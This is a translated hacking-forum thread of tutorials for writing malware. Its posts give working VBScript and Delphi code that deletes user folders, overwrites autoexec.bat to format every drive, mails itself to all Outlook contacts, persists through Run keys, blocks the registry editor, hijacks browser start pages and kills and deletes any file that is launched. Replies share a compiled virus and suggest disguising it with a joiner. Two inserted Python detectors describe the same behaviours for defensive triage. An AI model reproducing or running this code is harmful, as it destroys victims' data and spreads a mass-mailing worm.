PXkod - Programming and Network Security...


manual


1

~Manual on creating a virus~ in VBS! (' - do not type in the paragraphs marked this way below)
-------------------------------------------------------------
Well, let's begin.......
Open plain Notepad (you can create almost anything with Notepad)......And write the main beginning of our virus:

CODE' paragraph
Set f = CreateObject("scripting.filesystemobject")
Set s = CreateObject("Wscript.Shell")
t=0: on error resume next
Set os = CreateObject("Shell.Application")
set ie = WScript.CreateObject("InternetExplorer.Application")
Set oe = WScript.CreateObject("Outlook.Application")

So, the stuffing is done....
Now I will write out the virus's main actions for YOU:.....

1) Let's make a message pop up for the user after our project is opened:
CODE'     Display a message
s.popup "text1", , "text2", 0+16

text1 - the message itself
text2 - the message title

0+x - message type
(0+0) - ordinary type
(0+16) - error
(0+64) - information
(0+48) - exclamation
(0+32) - question

2) We need to rename something....
CODE' Renaming all files on the Desktop to "text"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ðàáî÷èé ñòîë" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="text" & t
next
end if
next

text - the new text!
-------------------------------------

' Renaming the My Documents folder to "New_Name"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
set tf=f.getfolder(folder): tf.name="Íîâîå_Íàçâàíèå"
End if
next
------------------------------------

' Renaming all files in My Documents to "New_name"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="ÍÀÇÂÀÍÈÅ" & t
next
end if
next
------------------------------------

' Renaming all files in Start Menu\Programs to "new_name"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ãëàâíîå ìåíþ" then
set tf=f.getfolder(folder)
set af=tf.subfolders
For Each fl In af
set file=f.getfolder(fl):t=t+1
file.name="íîâîå_íàçâàíèå" & t
next
end if
next

3) We need to move something:

CODE' Moving the Desktop to "FOLDER"
For Each Folder In s.SpecialFolders
if right(folder,12)="Ðàáî÷èé ñòîë" then
f.copyfolder folder, "FOLDER"
f.deletefolder folder, true
next

(folder - a folder)
--------------------------------------

' Moving the My Documents folder to "folder"
For Each Folder In s.SpecialFolders
if right(folder,13)="Ìîè äîêóìåíòû" then
f.copyfolder folder, "ïàïêà"
f.deletefolder folder, true
next

4) ......Internet
CODE
' Make "http:\\hack-all.net" the home page
s.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http:\\hack-all.net"
----------------------------------------

' Go to the site "http:\\hack-all.net"
ie.Visible = True
ie.Navigate "http:\\hack-all.net"
----------------------------------------

' Send the virus to All of the adversary's contacts
For Index = 1 To oe.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = oe.CreateItem(0)
OutMail.to = oe.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "â òåìå ïèñüìà"
OutMail.Body = "â òåëå ïèñüìà"
OutMail.Attachments.Add WScript.ScriptFullName
OutMail.Send
Next

5) Deleting the objects we want....
CODE'     Deleting special folders
For Each Folder In s.SpecialFolders
-------------------------------------------------

' Deleting the Desktop
f.deletefolder s.SpecialFolders ("Desktop"),true
-------------------------------------------------

' Deleting Aplication Data
if right(folder,15)="Aplication Data" then f.deletefolder folder,true
-------------------------------------------------

' Deleting PrintHood
if  right(folder,9)="PrintHood"  then f.deletefolder folder,true
-------------------------------------------------

' Deleting ShellNew
if right(folder,8)="ShellNew" then f.deletefolder folder,true
-------------------------------------------------

' Deleting fonts
if right(folder,5)="FONTS" then f.deletefolder folder,true
-------------------------------------------------

' Deleting NetHood
if right(folder,7)="NetHood" then f.deletefolder folder,true
-------------------------------------------------

' Deleting the Start Menu
if right(folder,12)="Ãëàâíîå ìåíþ" then f.deletefolder folder,true
-------------------------------------------------

' Deleting SendTo
if right(folder,6)="SendTo" then f.deletefolder folder,true
-------------------------------------------------

' Deleting Recent
if right(folder,6)="Recent" then f.deletefolder folder,true
-------------------------------------------------

' Deleting Startup
if right(folder,12)="Àâòîçàãðóçêà" then f.deletefolder folder,true
-------------------------------------------------

' Deleting Favorites
if right(folder,9)="Èçáðàííîå" then f.deletefolder folder,true
-------------------------------------------------

' Deleting My Documents
if right(folder,13)="Ìîè äîêóìåíòû" then f.deletefolder folder,true
-------------------------------------------------

' Deleting Programs
if right(folder,9)="Ïðîãðàììû" then f.deletefolder folder,true
Next

6) Very malicious....... (I don't recommend doing this)
CODE'     Swap the mouse button functions
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
s.Run "rundll32 user32, SwapMouseButton"
-------------------------------------------------

'     Disable the keyboard (Windows 95, 98, Me only)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
s.Run "rundll32.exe keyboard.exe, disable"
-------------------------------------------------

'     Disable the mouse (Windows 95, 98, Me only)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
s.Run "rundll32.exe mouse.exe, disable"
-------------------------------------------------

' Minimize all windows
os.MinimizeAll
-------------------------------------------------

' Run on every reboot
Set File2 = f.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
-------------------------------------------------

' Block RegEdit (so that the registry editor won't start for him). To unblock it, set DisableRegistryTools to 0
s.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
-------------------------------------------------

'      Format All drives (Windows 95, 98, Me only)
If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5
-------------------------------------------------

'     Reboot the computer (Windows 95, 98, Me only)
s.Run "Rundll32.exe User.exe,ExitWindows"
-------------------------------------------------

'     Self-destruct
f.deletefile WScript.ScriptFullName, true

+2
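A static triage pass over script text for the behaviours listed in the post above (Run-key writes, DisableRegistryTools set to 1, start-page change, Outlook self-mailing, forced folder deletion), as an added example that is not part of the original thread. The rule names, the `statements` and `triage` functions and the sample fragments are constructed for illustration.

```python
import re

# Behaviours the post above lists, as patterns over ONE logical VBScript
# statement. VBScript is case-insensitive, so matching is too.
RULES = [
    ("run-key persistence",
     r'regwrite\s*\(?\s*"(hklm|hkey_local_machine|hkcu|hkey_current_user)'
     r'\\software\\microsoft\\windows\\currentversion\\run(services|once)?\\'),
    ("registry tools disabled",
     r'regwrite\b.*\\policies\\system\\disableregistrytools"\s*,\s*1\b'),
    ("browser start page changed",
     r'regwrite\b.*\\internet explorer\\main\\start page"'),
    ("Outlook automation", r'createobject\s*\(\s*"outlook\.application"'),
    ("script mails a copy of itself",
     r'attachments\.add\s*\(?\s*wscript\.scriptfullname'),
    ("script deletes itself", r'deletefile\s*\(?\s*wscript\.scriptfullname'),
    ("forced folder delete", r'deletefolder\b.*,\s*true\b'),
    ("autoexec.bat touched", r'"[a-z]:\\[^"]*autoexec\.bat"'),
]

def statements(source):
    """Yield (start_line, statement): comments dropped, ' _' continuations
    joined, ':'-separated statements split, never cutting inside a string."""
    carry, carry_no = "", None
    for no, raw in enumerate(source.splitlines(), 1):
        if re.match(r"\s*rem\b", raw, re.I):
            raw = ""
        parts, buf, in_str = [], "", False
        for ch in raw:
            if ch == '"':
                in_str = not in_str          # "" escapes toggle twice: harmless
            elif ch == "'" and not in_str:
                break                        # rest of the line is a comment
            elif ch == ":" and not in_str:
                parts.append(buf)
                buf = ""
                continue
            buf += ch
        parts.append(buf)
        parts[0] = carry + parts[0]
        starts = [carry_no or no] + [no] * (len(parts) - 1)
        carry, carry_no = "", None
        if parts[-1].rstrip().endswith(" _"):
            carry, carry_no = parts.pop().rstrip()[:-1], starts.pop()
        for start, part in zip(starts, parts):
            if part.strip():
                yield start, part.strip()
    if carry.strip():
        yield carry_no, carry.strip()

def triage(source):
    """Return [(line, rule_name)] for every rule a statement matches."""
    return [(no, name)
            for no, stmt in statements(source)
            for name, pattern in RULES
            if re.search(pattern, stmt, re.I)]

# Constructed sample: isolated fragments for the rules, not a working script.
SAMPLE = r'''
' old note: s.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\x", "y"
Set s = CreateObject("WScript.Shell"): Set oe = CreateObject("Outlook.Application")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Example", _
    "C:\Example\placeholder.vbs"
s.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
MsgBox "it's fine: nothing to see"
m.Attachments.Add WScript.ScriptFullName
'''

if __name__ == "__main__":
    for line_no, rule in triage(SAMPLE):
        print(f"line {line_no}: {rule}")
```

The commented-out RegWrite on line 2 of the sample and the apostrophe and colon inside the MsgBox string produce no findings, which is the reason for tokenising statements before matching.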

2

Gull, +1, thanks, I've been looking for an article on creating viruses in VBS for a long time

0

3

Good day! Today we'll write a simple but nasty virus - Trojan.StartPage.1505 (by Dr.WEB's classification).
Here is what it does:

The virus writes the URL http://teen-biz.com/ into the following system registry keys:
[HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Use Search Asst]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Page]
[HKCU\Software\Microsoft\Internet Explorer\Main\Search Bar]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL]
[HKCU\Software\Microsoft\Internet Explorer\SearchURL\provide]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant]. And that's not all! In the "Favorites" folder it creates the following links:


Approximately every 1.5 hours the trojan opens the following page in the browser:
http://toteen.com/cgi-bin/tds/in.cgi?outgo.

Nasty? All right, let's write it. Open Delphi and create a new project.

Next, delete Unit1 and all the extraneous lines from Project1. You should end up with the following:

program Project1;

uses
Windows, registry, ShellAPI;

begin

end.

Declare the variables in the variable list:

Var Reg:TRegistry;
F: TextFile;
I: Integer;

Next, write the main code:

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_Current_User;

Reg.OpenKey('Software\Microsoft\Internet Explorer\Main',true);
Reg.WriteString('Start Page','http://teen-biz.com/');
Reg.WriteString('Use Search Asst','http://teen-biz.com/');
Reg.WriteString('Search Page','http://teen-biz.com/');
Reg.WriteString('Search Bar','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer',true);
Reg.WriteString('SearchURL','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer\SearchURL',true);
Reg.WriteString('provide','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Internet Explorer\Search',true);
Reg.WriteString('SearchAssistant','http://teen-biz.com/');
Reg.CloseKey;

Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',true);

AssignFile(f, Reg.ReadString('Favorites') + '/Quality Galleries 50 000 freepics and movie.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://www.terra.es/personal8/banners1/');
Close(f);

AssignFile(f, Reg.ReadString('Favorites') + '/WOW VIDEOS AND PICS -- REALLY HARDCORE VIDEOS.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'URL=http://www.terra.es/personal8/banners2');
Close(f);

AssignFile(f, Reg.ReadString('Favorites') + '/Series Hardcore Pic Sets and Movies.url');
Rewrite(f);
Writeln(f,'[InternetShortcut]');
Writeln(f,'http://fujit.drocherway.com/cgi-bin/r.cgi?from=2');
Close(f);

Well, that's basically it! Compile and test!!!

0

4

Hello to everyone who dropped in here. Today we'll write a dangerous virus. The virus's destructive activity is as follows: the program blocks a BIG bunch of system settings, after which you have to reinstall Windows (an experienced user can, in principle, restore the system). Now we'll write this prank:

Create a new project and declare a new variable Reg, which will work with the registry. Now let's write the main code:

program Win32;

uses
  REgistry,
  Windows;

var Reg: TRegistry;

{$R Win32.res}

begin
Reg:=TRegistry.Create;  // Open the registry
Reg.RootKey:=HKEY_CURRENT_USER;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WRiteInteger('NoActiveDesktop',1);  // Block ActiveDesktop
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall',true);
Reg.WriteInteger('NoAddRemovePrograms',1); // Block Add/Remove Programs
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoAddPrinter',1); // Block adding a new printer
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoFileOpen',1);  // Block the ability to open a file in IE
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoBrowserSaveAs',1); // Block the ability to save a page in IE
Reg.CloseKey;
Reg.OpenKey('Software\Policies\Microsoft\Internet Explorer\Restrictions',true);
Reg.WriteInteger('NoBrowserContextMenu',1); // Block the context menu in IE
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.WriteInteger('NoDispCPL',1);  // Block display settings
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoChangeStartMenu',1); // Block the Start context menu
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoClose',1);   // Block the ability to shut down Windows
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoCommonGroups',1); // Block applications in Start - All Programs
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoCustomizeWebView',1); // Block folder view customization
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoPrinterTabs',1); // Hide some tabs in Printer Properties
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoDesktop',1); // Hide some tabs in Printer Properties
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoFind',1); // Hide the ability to search for files (Start - Search for files)
Reg.CloseKey;
Reg.OpenKey('SOFTFARE\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoFileMenu',1); // Block the "File" menu in IE and Explorer
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoFolderOptions',1); // Block folder options
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explîrer',true);
Reg.WriteInteger('NoRun',1); // Block launching the command line
Reg.CloseKey;
Reg.Free;
end.

That's all!

0
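An audit of registry export text for the values the posts above write: non-zero `No*`/`Disable*` restrictions under the Policies keys and Internet Explorer start/search URLs pointing at an unexpected host. This is an added example, not part of the original thread; `parse_reg`, `audit`, the `allowed_hosts` parameter and the sample export with its `.example` hosts are constructed for illustration.

```python
import re

# Keys and value names taken from the posts above; lower-cased for comparison.
POLICY_KEYS = (
    r"\software\microsoft\windows\currentversion\policies\explorer",
    r"\software\microsoft\windows\currentversion\policies\system",
    r"\software\microsoft\windows\currentversion\policies\uninstall",
    r"\software\policies\microsoft\internet explorer\restrictions",
)
IE_MAIN = r"\software\microsoft\internet explorer\main"
IE_URL_VALUES = {"start page", "search page", "search bar"}

def parse_reg(text):
    """Yield (key, name, kind, value) from decoded .reg export text.
    Only REG_DWORD and REG_SZ are needed here; other types are skipped."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # "[-KEY]" in a .reg file means "delete this key": nothing to audit
            key = None if line.startswith("[-") else line[1:-1]
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not (key and m):
            continue
        name, rhs = re.sub(r"\\(.)", r"\1", m.group(1)), m.group(2)
        dword = re.fullmatch(r"dword:([0-9a-f]{1,8})", rhs, re.I)
        if dword:
            yield key, name, "dword", int(dword.group(1), 16)
        elif len(rhs) >= 2 and rhs[0] == rhs[-1] == '"':
            yield key, name, "sz", re.sub(r"\\(.)", r"\1", rhs[1:-1])

def audit(text, allowed_hosts=frozenset()):
    """Return findings as (category, hive, detail) tuples, in file order."""
    findings = []
    for key, name, kind, value in parse_reg(text):
        hive, _, sub = key.partition("\\")
        sub = "\\" + sub.lower()
        if (sub in POLICY_KEYS and kind == "dword" and value != 0
                and re.match(r"(no|disable)", name, re.I)):
            findings.append(("restriction", hive, name))
        elif sub == IE_MAIN and kind == "sz" and name.lower() in IE_URL_VALUES:
            # tolerate both "http://host" and the "http:\\host" form seen above
            host = re.sub(r"^[a-z]+:[/\\]*", "", value.lower()).split("/")[0]
            if host not in allowed_hosts:
                findings.append(("browser-url", hive, f"{name} -> {host}"))
    return findings

# Constructed sample export (already decoded to text).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoClose"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://placeholder.example/"
"Search Page"="http://intranet.example/search"
"Window Title"="x"
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE_REG, allowed_hosts={"intranet.example"}):
        print(finding)
```

Regedit writes exports as UTF-16, so decode the file before passing its text to `audit`. The same policy values are also set legitimately by administrators, so a finding is a prompt to compare against the environment's baseline.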

5

Gull
+1. Thanks for the articles!

0

6

by the way, I tried making one just for fun =)
Description: Displays the message "Hello, Pieces!" + renames the "My Documents" folder to "My dump=)" +
+ makes the site http://pxkod.bbok.ru the home page + navigates to the site http://pxkod.bbok.ru + sends itself
to all contacts in the address book
only I think few people will want to run a file with the *.VBS extension on their own machine =(

download

0

7

{Lio} wrote:

only I think few people will want to run a file with the *.VBS extension on their own machine =(

Stuff this file into an .exe)))

0

8

well, simply renaming it didn't work))
and I'm too lazy to google how to convert it, and I don't really have the time

0

9

{Lio} wrote:

well, simply renaming it didn't work))

Lio, come on)))
So as not to hunt for specific programs, you can do all of this with a joiner)
You'll assign an icon at the same time.
It will look more believable)

0

10

The destructive capability of such a virus is fairly easy to nullify if you know the registry even a little ))  It seems to me the first thing to do is block access to the registry.... although it's more reliable to just format the local disks :p

0

11

WasD but destructiveness is sometimes stupid and rarely welcome. )
Only when needed. )
As for the registry - yes, that.
Though I still can't remember which keys need to be cleaned there... ))))

0

12

I seem to be getting dumber and dumber every day =(

anyway, here, download

0

13

{Lio} wrote:

anyway, here, download

Now that's cool of you XD I don't want to download the file vir_1.exe

0

14

WasD, well then download it, rename it and send it to someone =)
+ I gave the description above - it's essentially harmless =)

0

15

All right, virus scribblers, now I'll show you one useful little thing. I came up with it myself, but following Gull's manual
Blocking the registry in VBS will look like this:

Now, the useful conclusion from this. Suppose that because of a virus by some Kh (precisely Kh, not X) your registry won't open. Below is a program in the same VBS for unblocking the registry

Now, simply by running the application, we regain control over the registry, and therefore over the whole system. That's all for now.... I'm off to play some StarCraft ))

+1

16

Today we'll write a very dangerous virus. It will catch the launching and modification of files, get their names, terminate the process by name and delete them. For example, you refresh the Desktop and the virus deletes Shell32.dll. So, let's create a helper module that will monitor launches and changes in the system:

unit wfsU;

interface

type
// Structure with information about a change in the file system (passed to the callback procedure)

  PInfoCallBack = ^TInfoCallBack;
  TInfoCallBack = record
    FAction      : Integer; // change type (FILE_ACTION_XXX constants)
    FDrive       : string;  // drive on which the change occurred
    FOldFileName : string;  // file name before renaming
    FNewFileName : string;  // file name after renaming
  end;

  // callback procedure called when something changes in the file system
  TWatchFileSystemCallBack = procedure (pInfo: TInfoCallBack);

{ Start file system monitoring
  Parameters:
  pName    - name of the folder to monitor
  pFilter  - combination of FILE_NOTIFY_XXX constants
  pSubTree - whether to monitor all subfolders of the given folder
  pInfoCallBack - address of the callback procedure called when something changes in the file system}

procedure StartWatch(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
// Stop monitoring
procedure StopWatch;

procedure MyInfoCallBack(pInfo: TInfoCallBack);

implementation

uses
  Classes, Windows, SysUtils, TlHelp32;

const
  FILE_LIST_DIRECTORY   = $0001;

type
  PFileNotifyInformation = ^TFileNotifyInformation;
  TFileNotifyInformation = record
    NextEntryOffset : DWORD;
    Action          : DWORD;
    FileNameLength  : DWORD;
    FileName        : array[0..0] of WideChar;
  end;

  WFSError = class(Exception);

  TWFS = class(TThread)
  private
    FName           : string;
    FFilter         : Cardinal;
    FSubTree        : boolean;
    FInfoCallBack   : TWatchFileSystemCallBack;
    FWatchHandle    : THandle;
    FWatchBuf       : array[0..4096] of Byte;
    FOverLapp       : TOverlapped;
    FPOverLapp      : POverlapped;
    FBytesWritte    : DWORD;
    FCompletionPort : THandle;
    FNumBytes       : Cardinal;
    FOldFileName    : string;
    function CreateDirHandle(aDir: string): THandle;
    procedure WatchEvent;
    procedure HandleEvent;
  protected
    procedure Execute; override;
  public
    constructor Create(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
    destructor Destroy; override;
  end;

var
  WFS : TWFS;

function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
    UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
    UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
      PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;

procedure MyInfoCallBack(pInfo: TInfoCallBack);
  begin
     try
    case pInfo.FAction of
      FILE_ACTION_RENAMED_NEW_NAME: DeleteFile(pInfo.FDrive+pInfo.FNewFileName);
    else
      if pInfo.FAction<FILE_ACTION_RENAMED_OLD_NAME then
        KillTask(ExtractFileName(pInfo.FDrive+pInfo.FNewFileName));
        DeleteFile(pInfo.FDrive+pInfo.FNewFileName);
    end;
    except
      //////////////
     end;
  end;

procedure StartWatch(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
begin
WFS:=TWFS.Create(pName, pFilter, pSubTree, pInfoCallBack);
end;

procedure StopWatch;
var
  Temp : TWFS;
begin
  if Assigned(WFS) then
  begin
   PostQueuedCompletionStatus(WFS.FCompletionPort, 0, 0, nil);
   Temp := WFS;
   WFS:=nil;
   Temp.Terminate;
  end;
end;

constructor TWFS.Create(pName: string; pFilter: cardinal;
  pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
begin
  inherited Create(True);
  FreeOnTerminate:=True;
  FName:=IncludeTrailingBackslash(pName);
  FFilter:=pFilter;
  FSubTree:=pSubTree;
  FOldFileName:=EmptyStr;
  ZeroMemory(@FOverLapp, SizeOf(TOverLapped));
  FPOverLapp:=@FOverLapp;
  ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
  FInfoCallBack:=pInfoCallBack;
  Resume
end;

destructor TWFS.Destroy;
begin
  PostQueuedCompletionStatus(FCompletionPort, 0, 0, nil);
  CloseHandle(FWatchHandle);
  FWatchHandle:=0;
  CloseHandle(FCompletionPort);
  FCompletionPort:=0;
  inherited Destroy;
end;

function TWFS.CreateDirHandle(aDir: string): THandle;
begin
Result:=CreateFile(PChar(aDir), FILE_LIST_DIRECTORY, FILE_SHARE_READ+FILE_SHARE_DELETE+FILE_SHARE_WRITE,
                   nil,OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS or FILE_FLAG_OVERLAPPED, 0);
end;

procedure TWFS.Execute;
begin
  FWatchHandle:=CreateDirHandle(FName);
  WatchEvent;
end;

procedure TWFS.HandleEvent;
var
  FileNotifyInfo : PFileNotifyInformation;
  InfoCallBack   : TInfoCallBack;
  Offset         : Longint;
begin
  Pointer(FileNotifyInfo) := @FWatchBuf[0];
  repeat
    Offset:=FileNotifyInfo^.NextEntryOffset;
    InfoCallBack.FAction:=FileNotifyInfo^.Action;
    InfoCallBack.FDrive:=FName;
    SetString(InfoCallBack.FNewFileName,FileNotifyInfo^.FileName,
              FileNotifyInfo^.FileNameLength );
    InfoCallBack.FNewFileName:=Trim(InfoCallBack.FNewFileName);
    case FileNotifyInfo^.Action of
      FILE_ACTION_RENAMED_OLD_NAME: FOldFileName:=Trim(WideCharToString(@(FileNotifyInfo^.FileName[0])));
      FILE_ACTION_RENAMED_NEW_NAME: InfoCallBack.FOldFileName:=FOldFileName;
    end;

    FInfoCallBack(InfoCallBack);
    PChar(FileNotifyInfo):=PChar(FileNotifyInfo)+Offset;
  until (Offset=0) or Terminated;
end;

procedure TWFS.WatchEvent;
var
CompletionKey: Cardinal;
begin
  FCompletionPort:=CreateIoCompletionPort(FWatchHandle, 0, Longint(pointer(self)), 0);
  ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
  if not ReadDirectoryChanges(FWatchHandle, @FWatchBuf, SizeOf(FWatchBuf), FSubTree,
    FFilter, @FBytesWritte,  @FOverLapp, 0) then
  begin
    raise WFSError.Create(SysErrorMessage(GetLastError));
    Terminate;
  end else
  begin
    while not Terminated do
    begin
      GetQueuedCompletionStatus(FCompletionPort, FNumBytes, CompletionKey, FPOverLapp, INFINITE);
      if CompletionKey<>0 then
      begin
        Synchronize(HandleEvent);
        ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
        FBytesWritte:=0;
        ReadDirectoryChanges(FWatchHandle, @FWatchBuf, SizeOf(FWatchBuf), FSubTree, FFilter,
                             @FBytesWritte, @FOverLapp, 0);
      end else Terminate;
    end
  end
end;

end.

+2